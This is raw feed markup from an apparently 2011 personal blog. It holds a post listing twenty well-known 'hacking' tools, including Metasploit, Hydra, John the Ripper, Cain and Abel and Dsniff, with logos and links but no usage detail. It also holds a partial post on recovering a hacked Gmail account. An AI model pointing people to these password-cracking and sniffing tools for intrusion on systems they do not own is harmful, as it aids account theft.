&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp; There are so many Hacking tools available in the Network Security field. But there is the problems with beginners in order to select the best tools used for hacking ever.I am giving&amp;nbsp; just a list of Top 20 tools but soonly I will also provide you the Top 100 Hacking tools downloadable from here.&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHwyOpRhOruoDmX0zWfXw3AA3ZidHpDGWKA9ZvqO6qHvpHUc4CB0exFIxl6-nm0SiMxBQIyCnvhlK5Q93Ns2EgUbhwErn6TRBgwFAqqSMX49wX0EpGZTXXrShOY-IcLeOF95LxTc_n63M/s1600/nessus-80x77.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHwyOpRhOruoDmX0zWfXw3AA3ZidHpDGWKA9ZvqO6qHvpHUc4CB0exFIxl6-nm0SiMxBQIyCnvhlK5Q93Ns2EgUbhwErn6TRBgwFAqqSMX49wX0EpGZTXXrShOY-IcLeOF95LxTc_n63M/s1600/nessus-80x77.png&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
1. &lt;a href=&quot;http://www.nessus.org/&quot;&gt;Nessus&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXyZ-vuP_gnjhwX_4bohYPOgIVSfwrR-GQFR6KPmN2Qa5fg6iApIxr3VezapH7is4I2pAsLQIA2gmyLscOJdsVmohg9bu0mXv0u8xvV3FYlcTCX7K4n1oPwuxyrwGJZR8P3KwYtraSWVM/s1600/wireshark-80x144.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXyZ-vuP_gnjhwX_4bohYPOgIVSfwrR-GQFR6KPmN2Qa5fg6iApIxr3VezapH7is4I2pAsLQIA2gmyLscOJdsVmohg9bu0mXv0u8xvV3FYlcTCX7K4n1oPwuxyrwGJZR8P3KwYtraSWVM/s1600/wireshark-80x144.png&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
2. &lt;a href=&quot;http://www.wireshark.org/&quot;&gt;Wireshark&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNLaaf5RVvmfL-wF3IbC_DRyseghzqW6ftoea5nIbAobI_ZhfIXHvWDICh2U21IHNOe_f5KUPZkd-b5D7QgqX2eg8jYJ4S_WxVyzAamRzApZ-6euxbuJ_d2LQcFZmmrc4zeETbKxgFfik/s1600/snort-80x62.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNLaaf5RVvmfL-wF3IbC_DRyseghzqW6ftoea5nIbAobI_ZhfIXHvWDICh2U21IHNOe_f5KUPZkd-b5D7QgqX2eg8jYJ4S_WxVyzAamRzApZ-6euxbuJ_d2LQcFZmmrc4zeETbKxgFfik/s1600/snort-80x62.png&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
3. &lt;a href=&quot;http://www.snort.org/&quot;&gt;Snort&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDhvVZVpQCRJa600rCp3XHoA-cUmaFYtSqCZ-VoAgutZiwQ7pdFyhuNbn_rfW7_bFpN-5MbW6TCG-VS0iKL_jkKYis3EaQVbeYqN5SawrrpFEQ4MP70X19dPzW_fw42K68siCJMa8em8s/s1600/netcat-80x155.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDhvVZVpQCRJa600rCp3XHoA-cUmaFYtSqCZ-VoAgutZiwQ7pdFyhuNbn_rfW7_bFpN-5MbW6TCG-VS0iKL_jkKYis3EaQVbeYqN5SawrrpFEQ4MP70X19dPzW_fw42K68siCJMa8em8s/s1600/netcat-80x155.png&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
4. &lt;a href=&quot;http://www.vulnwatch.org/netcat/&quot;&gt;Natcat&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiED6TS40LMiIh_97Xavu-U9-5K85h84Wr4SMIUqcgiovup4TvhrDczZWYXssajRYIzJImnuAlNLWz-DkuDxka99bTfTfcWu_q1LEOsOQd4luAqDKdM7Hcbq_qRyez5CAMOOeVaKxIVxKE/s1600/metasploit-40x69.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiED6TS40LMiIh_97Xavu-U9-5K85h84Wr4SMIUqcgiovup4TvhrDczZWYXssajRYIzJImnuAlNLWz-DkuDxka99bTfTfcWu_q1LEOsOQd4luAqDKdM7Hcbq_qRyez5CAMOOeVaKxIVxKE/s1600/metasploit-40x69.png&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
5. &lt;a href=&quot;http://www.metasploit.com/&quot;&gt;Metasploit Framework&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFqYMHroOByvxTVJZr5SLwV_Qtvmt6ULFKw8mf0hQOsxwAyFin61T7DFjEgob7pRZ_VVhNMmfzOQ-pD5z9VfenDlIaqzYuu9Uaa5Rb4WQlTJXuAfwxpfY2wTsu1Sk88kMLng1Z8UlIQr4/s1600/hping-80x31.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFqYMHroOByvxTVJZr5SLwV_Qtvmt6ULFKw8mf0hQOsxwAyFin61T7DFjEgob7pRZ_VVhNMmfzOQ-pD5z9VfenDlIaqzYuu9Uaa5Rb4WQlTJXuAfwxpfY2wTsu1Sk88kMLng1Z8UlIQr4/s1600/hping-80x31.png&quot; /&gt;&lt;/a&gt; 6. &lt;a href=&quot;http://www.hping.org/&quot;&gt;Hping2&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfA-Q1jy_aNausR0qy6E9oWGO1uIw8lhhiNgxJuBY0PRi_9NluIB-BkwGb9vESRjA_2Tbeso_aGzjYpYoLfIicbPE2tpxhktydDRWP28iVzTES8rBdRL1A-NCEASJaUG4PwPTw_3dw4QE/s1600/kismet-80x46.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfA-Q1jy_aNausR0qy6E9oWGO1uIw8lhhiNgxJuBY0PRi_9NluIB-BkwGb9vESRjA_2Tbeso_aGzjYpYoLfIicbPE2tpxhktydDRWP28iVzTES8rBdRL1A-NCEASJaUG4PwPTw_3dw4QE/s1600/kismet-80x46.png&quot; /&gt;&lt;/a&gt;7. &lt;a href=&quot;http://www.kismetwireless.net/&quot;&gt;Kismet&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnMubRIgWBUyIMrRsbZOmal81jwZ7pxp8YUVQ64LAUY5HgkN-sDLrG8HM6Seg53cDPo1GYA2mpr1mHzRvg9am3KHYirVfYxPB6-pmvHzimZUgy-qjhBSJGOnMhIvzzh7V4l7oiMYc8e-0/s1600/tcpdump-80x70.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnMubRIgWBUyIMrRsbZOmal81jwZ7pxp8YUVQ64LAUY5HgkN-sDLrG8HM6Seg53cDPo1GYA2mpr1mHzRvg9am3KHYirVfYxPB6-pmvHzimZUgy-qjhBSJGOnMhIvzzh7V4l7oiMYc8e-0/s1600/tcpdump-80x70.png&quot; /&gt;&lt;/a&gt;8. &lt;a href=&quot;http://www.tcpdump.org/&quot;&gt;Tcpdump&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbRSM9lzXmqigK7q7N8UIohp4kaFpByoLrfJ3ZxlHJhtGPUkwC0GWhIqAK8W_ADbYAPnG1k1wy7Jl7xljD6cFihi5joIo_2KotkWyHbHahciONLUxdxfx95JI3rNkN3xYXlJ4rot1O7N8/s1600/cain-80x32.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbRSM9lzXmqigK7q7N8UIohp4kaFpByoLrfJ3ZxlHJhtGPUkwC0GWhIqAK8W_ADbYAPnG1k1wy7Jl7xljD6cFihi5joIo_2KotkWyHbHahciONLUxdxfx95JI3rNkN3xYXlJ4rot1O7N8/s1600/cain-80x32.png&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
9. &lt;a href=&quot;http://www.oxid.it/cain.html&quot;&gt;Cain and Abel&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimSk2SCOnIIiEQJ642oE1S1svgs4Xq1ygHLv5oWYQuAtcztKiEePaeUhU0locKi7CrTitJ1JJdSOZ6gjENAq6KSXyh3CCW5BcvZAluiKqlmWLgELVG9vcRpvi8mdZfyQ2zGY031SpkE2E/s1600/john-80x163.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimSk2SCOnIIiEQJ642oE1S1svgs4Xq1ygHLv5oWYQuAtcztKiEePaeUhU0locKi7CrTitJ1JJdSOZ6gjENAq6KSXyh3CCW5BcvZAluiKqlmWLgELVG9vcRpvi8mdZfyQ2zGY031SpkE2E/s1600/john-80x163.png&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
10. &lt;a href=&quot;http://www.openwall.com/john/&quot;&gt;John the Ripper&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4UV6SkQchepXtwvU2O7gGhf-FcFh_X10sU5FHap2i3IlLFf6XC7MzHpLTujeagIL4vojWjP81vTyuVy2zHP2htUU0rWp5EqWJUqcDBsYBM3curwMmOfQFfXzEx0IqUeg2HcMYBR58wwk/s1600/ettercap-80x22.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4UV6SkQchepXtwvU2O7gGhf-FcFh_X10sU5FHap2i3IlLFf6XC7MzHpLTujeagIL4vojWjP81vTyuVy2zHP2htUU0rWp5EqWJUqcDBsYBM3curwMmOfQFfXzEx0IqUeg2HcMYBR58wwk/s1600/ettercap-80x22.png&quot; /&gt;&lt;/a&gt; 11. &lt;a href=&quot;http://ettercap.sourceforge.net/&quot;&gt;Ettercap&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6YATeH3iz8MdlaYhxbs_kETgLNvpM3_PK-HMQaHTTdCv4AzfuohqkHJxJVExxcehnsEV27H9IPj56V1cvITvzoxe78cGAaV5gWXgDnpix0IfLNNsJCa2qVXGf1JthL8rB-R8VaBLsBAc/s1600/nikto-80x98.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6YATeH3iz8MdlaYhxbs_kETgLNvpM3_PK-HMQaHTTdCv4AzfuohqkHJxJVExxcehnsEV27H9IPj56V1cvITvzoxe78cGAaV5gWXgDnpix0IfLNNsJCa2qVXGf1JthL8rB-R8VaBLsBAc/s1600/nikto-80x98.png&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
12. &lt;a href=&quot;http://www.cirt.net/nikto2&quot;&gt;Nikto&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
13. &lt;span style=&quot;color: red;&quot;&gt; Ping/telnet/dig/traceroute/whois/netstat&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvVGyBAGUvpKnL0hWmFJRNl6DrpyBYgXqJSRcNEGRjxh9xguW1f0PymdHbJif9FbZQj5Uux8Dbk_zw-bReHonyrBjqrQ4Z9wvepZYkm7EZfzeNz_fDqqbv9u4AFAaDaHkrDr6_TEBoNC0/s1600/ssh-85x85.gif&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvVGyBAGUvpKnL0hWmFJRNl6DrpyBYgXqJSRcNEGRjxh9xguW1f0PymdHbJif9FbZQj5Uux8Dbk_zw-bReHonyrBjqrQ4Z9wvepZYkm7EZfzeNz_fDqqbv9u4AFAaDaHkrDr6_TEBoNC0/s1600/ssh-85x85.gif&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
14. &lt;a href=&quot;http://www.openssh.com/&quot;&gt;OpenSSH&lt;/a&gt; / &lt;a href=&quot;http://www.chiark.greenend.org.uk/%7Esgtatham/putty/&quot;&gt;Putty&lt;/a&gt; / &lt;a href=&quot;http://www.ssh.com/commerce/index.html&quot;&gt;SSH&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2nR71BFx8WdPHCvHBvegb0Wh5ETkjev6HUziBicURfZwwWCgXGoZKM0TUy5SuZ8cjxGPfW-sY78cHtXR4Ay_3f_I97Y8MRL9PCAU-ldszK0MyjLrIQiJykus94-_jOeRhEqCkbCl141o/s1600/hydra-80x79.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2nR71BFx8WdPHCvHBvegb0Wh5ETkjev6HUziBicURfZwwWCgXGoZKM0TUy5SuZ8cjxGPfW-sY78cHtXR4Ay_3f_I97Y8MRL9PCAU-ldszK0MyjLrIQiJykus94-_jOeRhEqCkbCl141o/s1600/hydra-80x79.png&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&amp;nbsp;15. &lt;a href=&quot;http://www.thc.org/thc-hydra/&quot;&gt;THC Hydra&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2mAd4CDUQBils-wFMEgLitzRJ8h5PECWwikPuOwO74f9maRt0EORMt2q75c9ysMuRMwN3nhtXlc-CHw1lQtYEd4_T1dp-9DBlJ5C4Q8Pg_gmygFCLJkBmwStD7elvshwFYI_rM6IHZKE/s1600/paros-80x41.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2mAd4CDUQBils-wFMEgLitzRJ8h5PECWwikPuOwO74f9maRt0EORMt2q75c9ysMuRMwN3nhtXlc-CHw1lQtYEd4_T1dp-9DBlJ5C4Q8Pg_gmygFCLJkBmwStD7elvshwFYI_rM6IHZKE/s1600/paros-80x41.png&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
16. &lt;a href=&quot;http://www.parosproxy.org/&quot;&gt;Paros Proxy&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBWiXVUFDDTHOsCUPnmjjCD9iRBLLqNm7pQ1nUe1PR6ji6-9nsXcUVV2FMKlJqcju6qGRt2cycd2HrFeDI6Cnyyid4nv6jSJA56S3sCepfN5PpLnnQjnYdFWDM_TyOlEkcNB-FIzphBXg/s1600/dsniff-80x96.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBWiXVUFDDTHOsCUPnmjjCD9iRBLLqNm7pQ1nUe1PR6ji6-9nsXcUVV2FMKlJqcju6qGRt2cycd2HrFeDI6Cnyyid4nv6jSJA56S3sCepfN5PpLnnQjnYdFWDM_TyOlEkcNB-FIzphBXg/s1600/dsniff-80x96.png&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;17. &lt;a href=&quot;http://www.monkey.org/%7Edugsong/dsniff/&quot;&gt;Dsniff&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-FhhC8XOT_cs2CGo4ZLk1wuvfv7T2_OHHRm5oXL-DN2hGguCJ_6Um2pR4_60o5AfVqbrYW37l4JJ7v2f5yHxAunC3nUk8OiBtGOv51rbzlOSFArpu9ZsmpQah1w0967sBCEp8q5BssD8/s1600/netstumbler-80x26.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-FhhC8XOT_cs2CGo4ZLk1wuvfv7T2_OHHRm5oXL-DN2hGguCJ_6Um2pR4_60o5AfVqbrYW37l4JJ7v2f5yHxAunC3nUk8OiBtGOv51rbzlOSFArpu9ZsmpQah1w0967sBCEp8q5BssD8/s1600/netstumbler-80x26.png&quot; /&gt;&lt;/a&gt; 18. &lt;a href=&quot;http://www.stumbler.net/&quot;&gt;NetStumbler&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieqCE-CZ6cF7gB_4cDbTVHKDD6k3Oj7YegoBwkRP1D57YwvuQlhv0Hahj5N0Aki1WQdE1CXLyk0JPRSYzTMH4piP6Q97j9iBdkTRKIIDhfBYQZ7n6ntrZYqzGbcog6Sn2etCTcIRKhsFM/s1600/amap-80x79.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieqCE-CZ6cF7gB_4cDbTVHKDD6k3Oj7YegoBwkRP1D57YwvuQlhv0Hahj5N0Aki1WQdE1CXLyk0JPRSYzTMH4piP6Q97j9iBdkTRKIIDhfBYQZ7n6ntrZYqzGbcog6Sn2etCTcIRKhsFM/s1600/amap-80x79.png&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
19. &lt;a href=&quot;http://www.thc.org/thc-amap/&quot;&gt;THC Amap&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8B0qZsWba0JjOhNGo3bF3EaSy8fsbWta_Rh2xRmVBhCfwB4evh-G9h_u2qsYdDnD-s4fpmM0liJtYH0DILBVz2eNMiAA_WIEi5JapfeS_5ucidh9fxhThpv0TL4P5TBLUT16uIsYVnLY/s1600/gfi-80x51.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8B0qZsWba0JjOhNGo3bF3EaSy8fsbWta_Rh2xRmVBhCfwB4evh-G9h_u2qsYdDnD-s4fpmM0liJtYH0DILBVz2eNMiAA_WIEi5JapfeS_5ucidh9fxhThpv0TL4P5TBLUT16uIsYVnLY/s1600/gfi-80x51.png&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&amp;nbsp;20. &lt;a href=&quot;http://www.gfi.com/lannetscan/&quot;&gt;GFI LANguard&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If you want more on Hacking tools then You can &lt;a href=&quot;mailto:exploreamittyagi@gmail.com&quot;&gt;Mail Me&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;</description><link>http://amit-spot.blogspot.com/2011/02/top-20-hacking-tools.html</link><author>noreply@blogger.com (Amit Tyagi)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHwyOpRhOruoDmX0zWfXw3AA3ZidHpDGWKA9ZvqO6qHvpHUc4CB0exFIxl6-nm0SiMxBQIyCnvhlK5Q93Ns2EgUbhwErn6TRBgwFAqqSMX49wX0EpGZTXXrShOY-IcLeOF95LxTc_n63M/s72-c/nessus-80x77.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-833439627524125083</guid><pubDate>Mon, 17 Jan 2011 02:48:00 +0000</pubDate><atom:updated>2011-01-29T21:07:44.360-08:00</atom:updated><title>Recover Hacked E-mail Account-</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica; font-size: 14px; line-height: 24px;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;h2 style=&quot;font: 1.4em Arial; margin: 0px; padding: 0px; text-align: center;&quot;&gt;How to Recover Hacked Email Accounts?&lt;/h2&gt;&lt;div style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px 0px 15px; padding: 0px; text-align: justify;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1eHSbY8b9zxj4NmeSzfaRXR_OM441ijyJgn4XzFBJ4CPTD5xu9SL58ljVSyLkD0F-Fo_bbR5fMWAS7nnyD98zxirHjo389JYbZIYMwdV4uixGDvUzehopgbPwqtJBff6-0Fl0qYFlN10/s1600/ammm.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1eHSbY8b9zxj4NmeSzfaRXR_OM441ijyJgn4XzFBJ4CPTD5xu9SL58ljVSyLkD0F-Fo_bbR5fMWAS7nnyD98zxirHjo389JYbZIYMwdV4uixGDvUzehopgbPwqtJBff6-0Fl0qYFlN10/s1600/ammm.jpg&quot; /&gt;&lt;/a&gt;It can be a real nightmare if someone hacks and&amp;nbsp;takes control of your email account&amp;nbsp;as it may contain confidential information like bank logins, credit card details and other sensitive data. If you are one such Internet user whose email account has been compromised, then this post will surely help you out. In this post you will find the possible ways and procedures&amp;nbsp;to get back&amp;nbsp;your hacked email account.&lt;/div&gt;&lt;div style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/div&gt;&lt;h2 style=&quot;font: 1.4em Arial; margin: 0px; padding: 0px;&quot;&gt;For Gmail:&lt;/h2&gt;&lt;div style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px 0px 15px; padding: 0px; text-align: justify;&quot;&gt;It can be a big disaster if your Gmail account has been compromised as&amp;nbsp;it may&amp;nbsp;be associated with&amp;nbsp;several services like Blogger, Analytics, Adwords, Adsense, Orkut etc. Losing access to your Gmail account means losing access to all the services associated it with too. Here is a list of possible recovery actions that you can try.&lt;/div&gt;&lt;div style=&quot;margin: 0px 0px 15px; padding: 0px; text-align: justify;&quot;&gt;&lt;b style=&quot;margin: 0px; padding: 0px;&quot;&gt;Step -1:&lt;/b&gt;&amp;nbsp;Try resetting your password since it is the easiest way to get your account back in action. In this process Google may ask you to&amp;nbsp;answer&amp;nbsp;the secret question or may send the&amp;nbsp;password reset details&amp;nbsp;to&amp;nbsp;the secondary email address associated with&amp;nbsp;your compromised account. You can reset you password from the following link&lt;/div&gt;&lt;div style=&quot;margin: 0px 0px 15px; padding: 0px;&quot;&gt;&lt;a href=&quot;https://www.google.com/accounts/ForgotPasswd&quot;&gt;&amp;nbsp;Gmail Password Recovery Link&lt;/a&gt;&lt;br /&gt;
If you cannot find success from the Step-1 then proceed to Step-2.&lt;/div&gt;&lt;div style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px 0px 15px; padding: 0px; text-align: justify;&quot;&gt;&lt;b style=&quot;margin: 0px; padding: 0px;&quot;&gt;Step-2:&lt;/b&gt;&amp;nbsp;Many times&amp;nbsp;the hacker&amp;nbsp;will change the secret question and secondary email address&amp;nbsp;right after the account is compromised. This is the reason&amp;nbsp;for&amp;nbsp;the Password Reset process to fail. If this is the case then you need to contact the Gmail support team by filling out the account recovery form. This form will ask you to fill out several questions like&lt;/div&gt;&lt;div style=&quot;margin: 0px 0px 15px; padding: 0px;&quot;&gt;1. Email addresses of up to five frequently emailed contacts&lt;br /&gt;
2. Names of any 4 Labels that you may have created in your account&lt;br /&gt;
3. List of other services associated with your compromised account&lt;br /&gt;
4. Your last successful login date&lt;br /&gt;
5. Account created date&lt;br /&gt;
6. Last password that you remember and many more…&lt;/div&gt;&lt;div style=&quot;margin: 0px 0px 15px; padding: 0px; text-align: justify;&quot;&gt;You need to fill out this form as much&amp;nbsp;accurately as&amp;nbsp;possible. It is obvious to forget the dates&amp;nbsp;of last login, account creation and similar terms. However you need to figure out the closest possible date/answers and fill out&amp;nbsp;this form. This is&amp;nbsp;your last chance! The more accurate the information filled out in the&amp;nbsp;recovery form, the more the chances of getting your account back. You may reach the account recovery page form the following link&lt;br /&gt;
&lt;br /&gt;
